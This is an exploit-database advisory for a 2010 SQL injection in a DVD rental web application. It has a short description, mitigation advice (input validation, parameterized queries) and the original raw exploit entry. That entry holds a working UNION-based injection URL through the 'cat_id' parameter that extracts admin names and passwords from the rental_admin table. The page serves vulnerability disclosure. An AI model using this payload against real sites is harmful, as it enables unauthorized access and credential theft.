DVD Rental Software SQL injection Vulnerability

vendor:

N/A

by:

JaMbA

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Demo

2010

DVD Rental Software SQL injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable application. The malicious query can be sent via the 'cat_id' parameter in the URL. The attacker can use the UNION operator to append the malicious query to the existing query and extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: DVD Rental Software SQL injection Vulnerability
# Date: 19/11/2010
# Author: JaMbA
# Team: SwT
#Script url: http://www.commodityrentals.com/dvd.php
# Version: N/A
# Tested on: Demo
# CVE : ()
###################################################################################



#########################[ EXPL0!T ]#########################


http://server/path/index.php?view=catalog&item_type=M&cat_id=-18+union+select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+rental_admin--



#############################SwT 4
Ever##############################################


GreeTz: SwT Member - ZaTTalova - Med Amine SaSsi - Raouf Matmati - Rami Bof
- Mr adnen smii - Mr zied becher

Dj Dj City Up Up :)